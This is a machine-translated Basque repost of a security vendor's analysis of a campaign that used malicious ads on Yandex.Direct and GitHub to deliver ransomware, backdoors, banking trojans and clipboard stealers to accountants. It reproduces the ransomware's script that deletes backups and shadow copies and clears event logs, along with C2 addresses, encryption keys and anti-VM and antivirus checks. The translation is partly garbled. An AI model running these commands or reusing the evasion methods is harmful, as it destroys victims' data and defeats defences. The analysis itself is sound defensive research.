Eraso zibernetiko batean kontulariei bideratzeko, sarean bilatzen dituzten lan dokumentuak erabil ditzakezu. Hori da, gutxi gorabehera, ziber-talde batek azken hilabeteotan egiten ari dena, atzeko ate ezagunak banatzen. ΠΈ , baita zifratzaileak eta kripto-monetak lapurtzeko softwarea ere. Helburu gehienak Errusian daude. Erasoa Yandex.Direct-en publizitate gaiztoa jarriz egin zen. Balizko biktimak webgune batera bideratu zituzten, non dokumentu txantiloi gisa mozorrotutako fitxategi maltzur bat deskargatzeko eskatu zieten. Yandex-ek iragarki gaiztoa kendu zuen gure abisuaren ondoren.
Buhtrap-en iturburu-kodea sarean filtratu da iraganean, edonork erabil dezan. Ez dugu RTM kodearen erabilgarritasunari buruzko informaziorik.
Argitalpen honetan erasotzaileek Yandex.Direct erabiliz malwarea nola banatu eta GitHub-en nola ostatatu zuten kontatuko dizugu. Posta malwarearen azterketa tekniko batekin amaituko da.
Buhtrap eta RTM negozioan itzuli dira
Zabaltzeko eta biktimen mekanismoa
Biktimei entregatutako karga ezberdinek hedapen mekanismo komun bat partekatzen dute. Erasotzaileek sortutako fitxategi maltzur guztiak GitHub-eko bi biltegi ezberdinetan jarri ziren.
Normalean, biltegiak deskarga daitekeen fitxategi maltzur bat zuen, maiz aldatzen zena. GitHub-ek biltegi bateko aldaketen historia ikusteko aukera ematen dizunez, epe jakin batean zer malware banatu den ikus dezakegu. Biktima fitxategi gaiztoa deskargatzeko konbentzitzeko, goiko irudian ageri den Blanki-shabloni24[.]ru webgunea erabili zen.
Gunearen diseinuak eta fitxategi maltzurren izen guztiek kontzeptu bakarra jarraitzen dute: inprimakiak, txantiloiak, kontratuak, laginak, etab. Buhtrap eta RTM softwarea iraganean kontularien aurkako erasoetan dagoeneko erabili izan dela kontuan hartuta, uste dugu kanpaina berrian estrategia bera da. Galdera bakarra da biktima nola iritsi den erasotzaileen webgunera.
infekzio
Gutxienez, gune honetan amaitu zuten hainbat biktima potentzial publizitate gaiztoek erakarri zituzten. Jarraian URL adibide bat dago:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ΡΠΊΠ°ΡΠ°ΡΡ Π±Π»Π°Π½ΠΊ ΡΡΠ΅ΡΠ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Estekan ikus dezakezun bezala, banner bb.f2[.]kz legezko kontabilitate foroan argitaratu zen. Garrantzitsua da pankartak gune ezberdinetan agertzen zirela, denek kanpainaren ID bera zutela (blanki_rsya) eta gehienek kontabilitate edo legezko laguntza zerbitzuekin erlazionatuta. URLak erakusten du biktima potentzialak "deskargatu faktura-inprimakia" eskaera erabili zuela, eta horrek onartzen du xede-erasoen gure hipotesia. Jarraian, pankartak agertu diren guneak eta dagozkien bilaketa-kontsultak daude.
- deskargatu faktura inprimakia β bb.f2[.]kz
- lagin-kontratua - Ipopen[.]ru
- aplikazioaren kexa lagina - 77metrov[.]ru
- akordio formularioa - hutsik-dogovor-kupli-prodazhi[.]ru
- epaitegiko eskaeraren adibidea - zen.yandex[.]ru
- lagin kexa - yurday[.]ru
- lagin-kontratu-inprimakiak β Regforum[.]ru
- kontratu forma β assistentus[.]ru
- apartamentu-hitzarmenaren adibidea β ββnapravah[.]com
- legezko kontratuen laginak - avito[.]ru
Baliteke blanki-shabloni24[.]ru gunea ikus-ebaluazio sinple bat gainditzeko konfiguratuta egotea. Normalean, GitHub-erako esteka duen itxura profesionaleko gune batera seinalatzen duen iragarkiak ez du itxura txarra denik. Horrez gain, erasotzaileek fitxategi gaiztoak biltegira kargatu zituzten epe mugatu batez, ziurrenik kanpainan zehar. Gehienetan, GitHub biltegiak zip artxibo huts bat edo EXE fitxategi huts bat zuen. Horrela, erasotzaileek Yandex.Direct bidez publizitatea banatu ahal izan zuten bilaketa-kontsulta zehatzei erantzunez etorritako kontulariek bisitatu zituzten guneetan.
Jarraian, ikus ditzagun modu honetan banatutako karga ezberdinak.
Karga erabilgarriaren analisia
Banaketaren kronologia
Kanpaina gaiztoa 2018ko urriaren amaieran hasi zen eta idazten ari den unean aktibo dago. Biltegi osoa GitHub-en publikoki eskuragarri zegoenez, sei malware-familia ezberdinen banaketaren kronograma zehatza osatu genuen (ikus beheko irudia). Banner esteka noiz aurkitu zen erakusten duen lerro bat gehitu dugu, ESET telemetriak neurtuta, git historiarekin alderatzeko. Ikus dezakezunez, hau ondo lotzen da GitHub-en kargaren erabilgarritasunarekin. Otsailaren amaierako desadostasuna aldaketen historiaren zatirik ez genuelako azal daiteke, biltegia GitHub-etik kendu baitzen osorik eskuratu ahal izan baino lehen.
1. irudia. Malwarearen banaketaren kronologia.
Kodea sinatzeko ziurtagiriak
Kanpainak hainbat ziurtagiri erabili zituen. Batzuk malware familia batek baino gehiagok sinatu zituzten, eta horrek, gainera, lagin desberdinak kanpaina berekoak zirela adierazten du. Gako pribatua eskuragarri egon arren, operadoreek ez zituzten sistematikoki bitarrak sinatu eta ez zuten gakoa erabili lagin guztietarako. 2019ko otsailaren amaieran, erasotzaileak sinadura baliogabeak sortzen hasi ziren gako pribatua ez zuten Google-ren jabetzako ziurtagiri bat erabiliz.
Kanpainan parte hartzen duten ziurtagiri guztiak eta sinatzen dituzten malware-familiak beheko taulan ageri dira.
Kode sinatzeko ziurtagiri hauek ere erabili ditugu beste malware-familia batzuekin loturak ezartzeko. Ziurtagiri gehienetarako, ez dugu GitHub biltegi baten bidez banatu ez diren laginak aurkitu. Hala ere, TOV "MARIYA" ziurtagiria botnet-eko malwarea sinatzeko erabili zen , adware eta meatzariak. Nekez dago malware hau kanpaina honekin lotuta egotea. Seguruenik, ziurtagiria darknet-en erosi zen.
Win32/Filecoder.Buhtrap
Arreta eman zigun lehen osagaia aurkitu berri den Win32/Filecoder.Buhtrap izan zen. Batzuetan paketatzen den Delphi fitxategi bitar bat da. Batez ere 2019ko otsailean-martxoan banatu zen. Ransomware programa bati dagokion bezala jokatzen du: tokiko unitateak eta sareko karpetak bilatzen ditu eta detektaturiko fitxategiak enkriptatzen ditu. Ez du Internet konexiorik behar arriskuan egoteko, ez baita zerbitzariarekin harremanetan jartzen enkriptazio-gakoak bidaltzeko. Horren ordez, "token" bat gehitzen du erreskate mezuaren amaieran, eta posta elektronikoa edo Bitmessage erabiltzea proposatzen du operadoreekin harremanetan jartzeko.
Ahalik eta baliabide sentikor gehien enkriptatzeko, Filecoder.Buhtrap-ek enkriptatzea oztopatu dezakeen informazio baliotsua duten fitxategi-kudeatzaile irekiak izan ditzakeen gako-softwarea ixteko diseinatutako haria exekutatzen du. Xede-prozesuak datu-baseak kudeatzeko sistemak (DBMS) dira batez ere. Horrez gain, Filecoder.Buhtrap-ek erregistro-fitxategiak eta babeskopiak ezabatzen ditu datuak berreskuratzea zaila izan dadin. Horretarako, exekutatu batch script-a behean.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap-ek webguneko bisitariei buruzko informazioa biltzeko diseinatutako lineako IP Logger zerbitzu zilegi bat erabiltzen du. Honek ransomwarearen biktimen jarraipena egin nahi du, hau da, komando-lerroaren ardura:
mshta.exe "javascript:document.write('');"
Zifratzeko fitxategiak hautatzen dira hiru bazterketa-zerrendekin bat ez badatoz. Lehenik eta behin, luzapen hauek dituzten fitxategiak ez dira enkriptatzen: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys eta .bat. Bigarrenik, bide osoa beheko zerrendako direktorio-kateak dituzten fitxategi guztiak baztertzen dira.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Hirugarrenik, zenbait fitxategi-izen ere enkriptaziotik kanpo geratzen dira, horien artean erreskate-mezuaren fitxategi-izena. Zerrenda behean aurkezten da. Jakina, salbuespen hauek guztiak makina martxan mantentzeko helburua dute, baina errepideko zirkulazio gutxienekoarekin.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Fitxategiak enkriptatzeko eskema
Behin exekutatuta, malwareak 512 biteko RSA gako-pare bat sortzen du. Berretzaile pribatua (d) eta modulua (n) 2048 biteko gako publiko gogor batekin zifratzen dira (berretzaile eta modulu publikoa), zlib-paketatuta eta base64 kodetuta. Horren ardura duen kodea 2. irudian ageri da.
2. Irudia. 512 biteko RSA gako bikoteak sortzeko prozesuaren Hex-Rays deskonpilazioaren emaitza.
Jarraian, sortutako gako pribatu batekin testu arruntaren adibide bat dago, hau da, erreskate mezuari erantsitako token bat.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Erasotzaileen gako publikoa behean ematen da.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Fitxategiak AES-128-CBC erabiliz enkriptatzen dira 256 biteko gako batekin. Enkriptatutako fitxategi bakoitzeko, gako berri bat eta hasierako bektore berri bat sortzen dira. Gako-informazioa enkriptatutako fitxategiaren amaieran gehitzen da. Kontuan izan dezagun enkriptatutako fitxategiaren formatua.
Enkriptatutako fitxategiek goiburu hau dute:
VEGA balio magikoa gehituta iturburu-fitxategiaren datuak lehen 0x5000 bytetan enkriptatzen dira. Deszifratze informazio guztia egitura hau duen fitxategi bati atxikita dago:
- Fitxategiaren tamaina-markatzaileak marka bat dauka, fitxategia 0x5000 byte baino handiagoa den adierazten duena.
β AES gako blob = ZlibCompress (RSAEncrypt (AES gakoa + IV, sortutako RSA gako bikotearen gako publikoa))
- RSA gako blob = ZlibCompress (RSAEncrypt (sortutako RSA gako pribatua, gogor kodetutako RSA gako publikoa))
Win32/ClipBanker
Win32/ClipBanker 2018ko urriaren amaieratik abenduaren hasiera arte tarteka banatu zen osagai bat da. Bere eginkizuna arbelaren edukia kontrolatzea da, kriptografia-moneta-zorroen helbideak bilatzen ditu. Helburu-zorroaren helbidea zehaztu ondoren, ClipBanker-ek operadoreena dela uste duen helbide batekin ordezkatzen du. Aztertu ditugun laginak ez ziren ez kutxatu, ez lausotu. Portaera ezkutatzeko erabiltzen den mekanismo bakarra kateen enkriptatzea da. Operadoreen zorroaren helbideak RC4 erabiliz enkriptatzen dira. Xede kripto-monetak Bitcoin, Bitcoin cash, Dogecoin, Ethereum eta Ripple dira.
Malwarea erasotzaileen Bitcoin zorroetara zabaltzen ari zen garaian, kopuru txiki bat bidali zen VTSra, eta horrek kanpainaren arrakasta zalantzan jartzen du. Gainera, ez dago transakzio horiek ClipBankerrekin erlazionatuta zeudenik iradokitzeko frogarik.
Win32/RTM
Win32/RTM osagaia hainbat egunetan banatu zen 2019ko martxoaren hasieran. RTM Delphi-n idatzitako troiako bankari bat da, urruneko banku-sistemetara zuzenduta. 2017an, ESETeko ikertzaileek argitaratu zuten programa honen deskribapena oraindik garrantzitsua da. 2019ko urtarrilean, Palo Alto Networks-ek ere kaleratu zuen .
Buhtrap kargagailua
Denbora batez, GitHub-en deskargatzaile bat zegoen eskuragarri, aurreko Buhtrap tresnen antzekoa ez zena. Hara jotzen du https://94.100.18[.]67/RSS.php?<some_id> hurrengo etapa lortzeko eta zuzenean memorian kargatzeko. Bigarren etapako kodearen bi portaera bereiz ditzakegu. Lehen URLan, RSS.php-ek Buhtrap atzeko atea pasa zuen zuzenean - atzeko ate hau iturburu kodea filtratu ondoren eskuragarri dagoenaren oso antzekoa da.
Interesgarria da Buhtrap atzeko atearekin hainbat kanpaina ikusten ditugula, eta ustez operadore ezberdinek zuzentzen dituzte. Kasu honetan, desberdintasun nagusia da atzeko atea zuzenean memorian kargatzen dela eta ez duela ohiko eskema erabiltzen hitz egin dugun DLL inplementatzeko prozesuarekin. . Gainera, operadoreek sareko trafikoa enkriptatzeko erabiltzen den RC4 gakoa aldatu zuten C&C zerbitzarira. Ikusi ditugun kanpaina gehienetan, operadoreek ez zuten trabarik hartu gako hori aldatzeko.
Bigarren jokaera konplexuagoa izan zen RSS.php URLa beste kargatzaile batera pasa zela. Lausotze batzuk inplementatu zituen, hala nola inportazio dinamikoko taula berreraikitzea. Abio-kargatzailearen helburua C&C zerbitzariarekin harremanetan jartzea da [.]com/api/F27F84EDA4D13B15/2, bidali erregistroak eta itxaron erantzuna. Erantzuna blob gisa prozesatzen du, memorian kargatzen du eta exekutatzen du. Kargatzaile hau exekutatzen ikusi genuen karga Buhtrap atzeko ate bera zen, baina baliteke beste osagai batzuk egotea.
Android/Spy.Banker
Interesgarria da, Android-erako osagai bat ere aurkitu zen GitHub biltegian. Egun bakarrean egon zen adar nagusian - 1ko azaroaren 2018ean. GitHub-en argitaratzeaz gain, ESET telemetriak ez du malware hau banatzen ari den frogarik aurkitzen.
Osagaia Android Aplikazio Pakete (APK) gisa ostatatuta zegoen. Oso lausotuta dago. Portaera gaiztoa APK-n dagoen JAR enkriptatutako batean ezkutatuta dago. RC4-rekin zifratzen da gako hau erabiliz:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Gako eta algoritmo bera erabiltzen dira kateak enkriptatzeko. JAR hemen dago APK_ROOT + image/files. Fitxategiaren lehen 4 byteek enkriptatutako JARaren luzera dute, luzera eremuaren ondoren berehala hasten dena.
Fitxategia deszifratu ondoren, Anubis zela aurkitu genuen - lehenago banker Androiderako. Malwareak ezaugarri hauek ditu:
- mikrofonoaren grabaketa
- pantaila-argazkiak egitea
- GPS koordenatuak eskuratzea
- keylogger
- gailuaren datuen enkriptatzea eta erreskate eskaera
- spam bidaltzea
Interesgarria da bankariak Twitter erabili zuen babeskopiko komunikazio kanal gisa beste C&C zerbitzari bat lortzeko. Aztertu genuen laginak @JonesTrader kontua erabiltzen zuen, baina azterketa egiteko momentuan jada blokeatuta zegoen.
Bankariak helburuko aplikazioen zerrenda dauka Android gailuan. Sophos ikerketan lortutako zerrenda baino luzeagoa da. Zerrendak banku-aplikazio asko, lineako erosketa-programak, hala nola Amazon eta eBay, eta kriptografia-moneta zerbitzuak biltzen ditu.
MSIL/ClipBanker.IH
Kanpaina honen barruan banatutako azken osagaia .NET Windows exekutagarria izan zen, 2019ko martxoan agertu zena. Aztertutako bertsio gehienak ConfuserEx v1.0.0-rekin bildu ziren. ClipBanker-ek bezala, osagai honek arbela erabiltzen du. Bere helburua kriptomoneta sorta zabala da, baita Steam-en eskaintzak ere. Gainera, IP Logger zerbitzua erabiltzen du Bitcoin WIF gako pribatua lapurtzeko.
Babes-mekanismoak
ConfuserEx-ek arazketa, isurketa eta manipulazioa saihesteko eskaintzen dituen abantailez gain, osagaiak birusen aurkako produktuak eta makina birtualak detektatzeko gaitasuna du.
Makina birtual batean exekutatzen dela egiaztatzeko, malwareak Windows WMI komando-lerroa (WMIC) erabiltzen du BIOSaren informazioa eskatzeko, hau da:
wmic bios
Ondoren, programak komandoaren irteera analizatzen du eta gako-hitzak bilatzen ditu: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Birusen aurkako produktuak detektatzeko, malwareak Windows Kudeaketa Instrumentazioa (WMI) eskaera bat bidaltzen du Windows Segurtasun Zentrora erabiliz ManagementObjectSearcher APIa behean erakusten den moduan. Base64-tik deskodetu ondoren deiak honela dauka:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
3. irudia. Birusen aurkako produktuak identifikatzeko prozesua.
Horrez gain, malwareak egiaztatzen du , arbeleko erasoetatik babesteko tresna eta, exekutatzen bada, prozesu horretako hari guztiak esekitzen ditu, eta horrela babesa desgaitzen du.
Iraunkortasuna
Aztertu dugun malwarearen bertsioak bere burua kopiatzen du %APPDATA%googleupdater.exe eta "ezkutuko" atributua ezartzen du google direktoriorako. Ondoren, balioa aldatzen du SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows erregistroan eta bidea gehitzen du updater.exe. Horrela, malwarea exekutatu egingo da erabiltzailea saioa hasten den bakoitzean.
Jokabide gaiztoa
ClipBanker-ek bezala, malwareak arbeleko edukia kontrolatzen du eta kriptografia-moneta-zorroaren helbideak bilatzen ditu, eta aurkitzen denean, operadorearen helbideetako batekin ordezkatzen du. Jarraian, xede-helbideen zerrenda dago kodean aurkitzen denaren arabera.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Helbide mota bakoitzari dagokion adierazpen erregular bat dago. STEAM_URL balioa Steam sistema erasotzeko erabiltzen da, bufferean definitzeko erabiltzen den adierazpen erregularrean ikus daitekeenez:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Infiltrazio kanala
Buffer-eko helbideak ordezkatzeaz gain, malwareak Bitcoin, Bitcoin Core eta Electrum Bitcoin zorroen WIF gako pribatuak ditu helburu. Programak plogger.org erabiltzen du infiltrazio kanal gisa WIF gako pribatua lortzeko. Horretarako, operadoreek gako pribatuaren datuak gehitzen dituzte Erabiltzaile-Agente HTTP goiburuan, behean erakusten den moduan.
4. Irudia. IP Logger kontsola irteerako datuekin.
Operadoreek ez zuten iplogger.org erabili zorroak kanporatzeko. Seguruenik, beste metodo batera jo zuten eremuan 255 karaktere mugagatik User-AgentIP Logger web interfazean bistaratzen da. Aztertu ditugun laginetan, beste irteera zerbitzaria ingurune-aldagaian gordetzen zen DiscordWebHook. Harrigarria bada ere, ingurune-aldagai hau ez dago kodean inon esleituta. Horrek iradokitzen du malwarea oraindik garatzen ari dela eta aldagaia operadorearen proba-makinari esleitzen zaiola.
Programa garatzen ari den beste seinale bat dago. Fitxategi bitarrak bi iplogger.org URL biltzen ditu, eta biak kontsultatzen dira datuak infiltratzen direnean. URL horietako bati egindako eskaeran, Erreferentzia eremuko balioa "DEV /" jartzen du aurretik. ConfuserEx erabiliz paketatu ez zen bertsio bat ere aurkitu dugu, URL honen hartzaileak DevFeedbackUrl du izena. Ingurugiro-aldagaiaren izenean oinarrituta, uste dugu operadoreek Discord zerbitzu legitimoa eta bere web atzemateko sistema erabiltzeko asmoa dutela kriptografia moneta-zorroak lapurtzeko.
Ondorioa
Kanpaina hau ziber-erasoetan iragarki-zerbitzu legitimoak erabiltzearen adibidea da. Eskemak Errusiako erakundeak ditu helburu, baina ez ginateke harrituko eraso bat errusiar ez diren zerbitzuak erabiliz ikusteak. Konpromisoa saihesteko, erabiltzaileek deskargatzen duten softwarearen iturriaren ospean konfiantza izan behar dute.
Konpromisoaren eta MITRE ATT&CK atributuen adierazleen zerrenda osoa eskuragarri dago hemen .
Iturria: www.habr.com